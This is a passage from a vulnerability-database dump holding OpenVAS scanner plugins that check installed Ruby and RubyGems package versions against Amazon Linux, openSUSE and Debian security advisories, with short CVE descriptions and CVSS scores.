rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_2-2_2\", rpm:\"libruby2_2-2_2~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libruby2_2-2_2-debuginfo\", rpm:\"libruby2_2-2_2-debuginfo~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2\", rpm:\"ruby2.2~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-debuginfo\", rpm:\"ruby2.2-debuginfo~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-debugsource\", rpm:\"ruby2.2-debugsource~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-devel\", rpm:\"ruby2.2-devel~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-devel-extra\", rpm:\"ruby2.2-devel-extra~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-doc\", rpm:\"ruby2.2-doc~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-stdlib\", rpm:\"ruby2.2-stdlib~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-stdlib-debuginfo\", rpm:\"ruby2.2-stdlib-debuginfo~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-tk\", rpm:\"ruby2.2-tk~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby2.2-tk-debuginfo\", rpm:\"ruby2.2-tk-debuginfo~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"uby2.2-doc-ri\", rpm:\"uby2.2-doc-ri~2.2.6~6.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T22:59:49", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-547)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120442", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120442", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120442\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:31 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-547)\");\n script_tag(name:\"insight\", value:\"RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900) As discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\");\n script_tag(name:\"solution\", value:\"Run yum update ruby20 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-547.html\");\n script_cve_id(\"CVE-2015-4020\", \"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby20\", rpm:\"ruby20~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-devel\", rpm:\"ruby20-devel~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-debuginfo\", rpm:\"ruby20-debuginfo~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem20-io-console\", rpm:\"rubygem20-io-console~0.4.2~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem20-bigdecimal\", rpm:\"rubygem20-bigdecimal~1.2.0~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-libs\", rpm:\"ruby20-libs~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems20-devel\", rpm:\"rubygems20-devel~2.0.14~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems20\", rpm:\"rubygems20~2.0.14~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-irb\", rpm:\"ruby20-irb~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby20-doc\", rpm:\"ruby20-doc~2.0.0.645~1.27.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-17T23:00:05", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-549)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120440", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120440", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120440\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:29 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-549)\");\n script_tag(name:\"insight\", value:\"RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900) As discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\");\n script_tag(name:\"solution\", value:\"Run yum update ruby22 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-549.html\");\n script_cve_id(\"CVE-2015-4020\", \"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"rubygem22-io-console\", rpm:\"rubygem22-io-console~0.4.3~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-devel\", rpm:\"ruby22-devel~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-libs\", rpm:\"ruby22-libs~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-debuginfo\", rpm:\"ruby22-debuginfo~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem22-bigdecimal\", rpm:\"rubygem22-bigdecimal~1.2.6~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem22-psych\", rpm:\"rubygem22-psych~2.0.8~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-doc\", rpm:\"ruby22-doc~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby22-irb\", rpm:\"ruby22-irb~2.2.2~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems22-devel\", rpm:\"rubygems22-devel~2.4.5~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems22\", rpm:\"rubygems22~2.4.5~1.6.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-17T22:58:49", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2015-09-08T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2015-548)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2015-4020"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120441", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120441", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120441\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 13:26:30 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2015-548)\");\n script_tag(name:\"insight\", value:\"RubyGems provides the ability of a domain to direct clients to a separate host that is used to fetch gems and make API calls against. This mechanism is implemented via DNS, specifically a SRV record _rubygems._tcp under the original requested domain. RubyGems did not validate the hostname returned in the SRV record before sending requests to it. (CVE-2015-3900) As discussed upstream, CVE-2015-4020 is due to an incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.\");\n script_tag(name:\"solution\", value:\"Run yum update ruby21 to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2015-548.html\");\n script_cve_id(\"CVE-2015-4020\", \"CVE-2015-3900\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-devel\", rpm:\"ruby21-devel~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-libs\", rpm:\"ruby21-libs~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21\", rpm:\"ruby21~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem21-bigdecimal\", rpm:\"rubygem21-bigdecimal~1.2.4~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygem21-io-console\", rpm:\"rubygem21-io-console~0.4.3~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-debuginfo\", rpm:\"ruby21-debuginfo~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems21\", rpm:\"rubygems21~2.2.3~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"rubygems21-devel\", rpm:\"rubygems21-devel~2.2.3~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-doc\", rpm:\"ruby21-doc~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ruby21-irb\", rpm:\"ruby21-irb~2.1.6~1.17.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-01-29T20:06:59", "description": "Several vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\nType confusion exists in _cancel_eval Ruby", "cvss3": {}, "published": "2018-09-03T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for ruby2.1 (DLA-1480-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2337", "CVE-2018-1000073", "CVE-2018-1000074"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891480", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891480", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891480\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2016-2337\", \"CVE-2018-1000073\", \"CVE-2018-1000074\");\n script_name(\"Debian LTS: Security Advisory for ruby2.1 (DLA-1480-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-09-03 00:00:00 +0200 (Mon, 03 Sep 2018)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/08/msg00028.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"ruby2.1 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u5.\n\nWe recommend that you upgrade your ruby2.1 packages.\");\n\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in Ruby 2.1.\n\nCVE-2016-2337\n\nType confusion exists in _cancel_eval Ruby's TclTkIp class\nmethod. Attacker passing different type of object than String as\n'retval' argument can cause arbitrary code execution.\n\nCVE-2018-1000073\n\nRubyGems contains a Directory Traversal vulnerability in\ninstall_location function of package.rb that can result in path\ntraversal when writing to a symlinked basedir outside of the root.\n\nCVE-2018-1000074\n\nRubyGems contains a Deserialization of Untrusted Data\nvulnerability in owner command that can result in code\nexecution. This attack appear to be exploitable via victim must\nrun the `gem owner` command on a gem with a specially crafted YAML\nfile.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby2.1\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-dev\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-doc\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-tcltk\", ver:\"2.1.5-2+deb8u5\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-29T20:07:15", "description": "Multiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2015-9096\n\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\nor MAIL FROM command.\n\nCVE-2016-2339\n\nExploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\nIncorrect handling of initialization vector in the GCM mode in the\nOpenSSL extension.\n\nDescription truncated. Please see the references for more information.", "cvss3": {}, "published": "2018-07-16T00:00:00", "type": "openvas", "title": "Debian LTS: Security Advisory for ruby2.1 (DLA-1421-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0898", "CVE-2017-0900", "CVE-2017-17405", "CVE-2017-0903", "CVE-2018-8778", "CVE-2017-17742", "CVE-2017-0899", "CVE-2017-10784", "CVE-2018-8780", "CVE-2018-1000078", "CVE-2016-2339", "CVE-2018-1000075", "CVE-2018-1000076", "CVE-2016-7798", "CVE-2017-0902", "CVE-2017-14033", "CVE-2017-17790", "CVE-2015-9096", "CVE-2018-8777", "CVE-2017-14064", "CVE-2017-0901", "CVE-2018-8779", "CVE-2018-1000077", "CVE-2018-1000079", "CVE-2018-6914"], "modified": "2020-01-29T00:00:00", "id": "OPENVAS:1361412562310891421", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310891421", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.891421\");\n script_version(\"2020-01-29T08:22:52+0000\");\n script_cve_id(\"CVE-2015-9096\", \"CVE-2016-2339\", \"CVE-2016-7798\", \"CVE-2017-0898\", \"CVE-2017-0899\",\n \"CVE-2017-0900\", \"CVE-2017-0901\", \"CVE-2017-0902\", \"CVE-2017-0903\", \"CVE-2017-10784\",\n \"CVE-2017-14033\", \"CVE-2017-14064\", \"CVE-2017-17405\", \"CVE-2017-17742\", \"CVE-2017-17790\",\n \"CVE-2018-1000075\", \"CVE-2018-1000076\", \"CVE-2018-1000077\", \"CVE-2018-1000078\", \"CVE-2018-1000079\",\n \"CVE-2018-6914\", \"CVE-2018-8777\", \"CVE-2018-8778\", \"CVE-2018-8779\", \"CVE-2018-8780\");\n script_name(\"Debian LTS: Security Advisory for ruby2.1 (DLA-1421-1)\");\n script_tag(name:\"last_modification\", value:\"2020-01-29 08:22:52 +0000 (Wed, 29 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-07-16 00:00:00 +0200 (Mon, 16 Jul 2018)\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n script_xref(name:\"URL\", value:\"https://lists.debian.org/debian-lts-announce/2018/07/msg00012.html\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB8\");\n\n script_tag(name:\"affected\", value:\"ruby2.1 on Debian Linux\");\n\n script_tag(name:\"solution\", value:\"For Debian 8 'Jessie', these problems have been fixed in version\n2.1.5-2+deb8u4.\n\nWe recommend that you upgrade your ruby2.1 packages.\");\n\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities were found in the interpreter for the Ruby\nlanguage. The Common Vulnerabilities and Exposures project identifies the\nfollowing issues:\n\nCVE-2015-9096\n\nSMTP command injection in Net::SMTP via CRLF sequences in a RCPT TO\nor MAIL FROM command.\n\nCVE-2016-2339\n\nExploitable heap overflow in Fiddle::Function.new.\n\nCVE-2016-7798\n\nIncorrect handling of initialization vector in the GCM mode in the\nOpenSSL extension.\n\nDescription truncated. Please see the references for more information.\");\n\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"libruby2.1\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-dev\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-doc\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"ruby2.1-tcltk\", ver:\"2.1.5-2+deb8u4\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-18T14:12:22", "description": "According to the versions of the ruby packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - An exploitable heap overflow vulnerability exists in the Fiddle::Function.new 'initialize' function functionality of Ruby. In Fiddle::Function.new 'initialize' heap buffer 'arg_types' allocation is made based on args array length. Specially constructed object passed as element of args array can increase this array size after mentioned allocation and cause heap overflow.(CVE-2016-2339)\n\n - Type confusion exists in _cancel_eval Ruby's TclTkIp class method. Attacker passing different type of object than String as 'retval' argument can cause arbitrary code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted 